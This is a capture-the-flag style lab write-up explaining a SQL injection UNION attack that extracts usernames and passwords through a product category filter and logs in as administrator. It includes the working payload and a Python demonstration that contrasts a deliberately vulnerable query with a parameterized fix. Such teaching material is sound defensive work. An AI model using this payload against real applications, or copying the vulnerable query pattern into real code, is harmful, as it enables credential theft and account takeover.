1.5 Lab: SQL injection UNION attack, retrieving data from other tables | 2023


Karthikeyan Nagaraj
Nov 24, 2023

Description

This lab contains a SQL injection vulnerability in the product category filter. The results from the query are returned in the application’s response, so you can use a UNION attack to retrieve data from other tables. To construct such an attack, you need to combine some of the techniques you learned in previous labs.

The database contains a different table called users, with columns called username and password.

To solve the lab, perform a SQL injection UNION attack that retrieves all usernames and passwords, and use the information to log in as the administrator user.

Solution

  1. As we know, the database contains a table called users with 2 columns called username and password, so the payload will be '+UNION+SELECT+username,+password+FROM+users--
  2. Append the above payload to the category parameter of any category filter request to display the data from the username and password columns
  3. Use the retrieved credentials to log in to the administrator account and solve the lab
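Why the payload from step 1 works, and why a bound parameter stops it, shown as an added example that is not part of the original post or the lab's code. It assumes a SQLite stand-in for the lab database, a hypothetical products schema and query, and constructed rows and passwords.

```python
import sqlite3
from urllib.parse import unquote_plus

# Payload exactly as given in step 1 of the solution (URL-encoded form).
PAYLOAD = "'+UNION+SELECT+username,+password+FROM+users--"

def make_db():
    """In-memory database. The products schema and every row are constructed."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products (name TEXT, description TEXT,
                               category TEXT, released INTEGER);
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO products VALUES ('Mug', 'Ceramic mug', 'Gifts', 1);
        INSERT INTO products VALUES ('Lamp', 'Desk lamp', 'Lighting', 1);
        INSERT INTO users VALUES ('administrator', 'constructed-admin-pw');
        INSERT INTO users VALUES ('alice', 'constructed-user-pw');
    """)
    return db

def filter_vulnerable(db, category_param):
    """Assumed shape of the flawed filter: input is pasted into the SQL text."""
    category = unquote_plus(category_param)  # '+' decodes to a space
    sql = ("SELECT name, description FROM products "
           f"WHERE category = '{category}' AND released = 1")
    # The quote closes the string literal, UNION appends a second two-column
    # SELECT, and '--' comments out the rest of the original statement.
    return db.execute(sql).fetchall()

def filter_parameterized(db, category_param):
    """Hardened form: the value is bound, so it is only ever compared as data."""
    category = unquote_plus(category_param)
    sql = ("SELECT name, description FROM products "
           "WHERE category = ? AND released = 1")
    return db.execute(sql, (category,)).fetchall()

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:   ", filter_vulnerable(db, "Gifts" + PAYLOAD))
    print("parameterized:", filter_parameterized(db, "Gifts" + PAYLOAD))
    print("normal use:   ", filter_parameterized(db, "Gifts"))
```

The UNION succeeds only because the injected SELECT returns the same number of columns as the original query, which is why the username and password pair fits this two-column filter.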


Thank you for Reading!

Happy Hacking ~

Author: Karthikeyan Nagaraj ~ Cyberw1ng
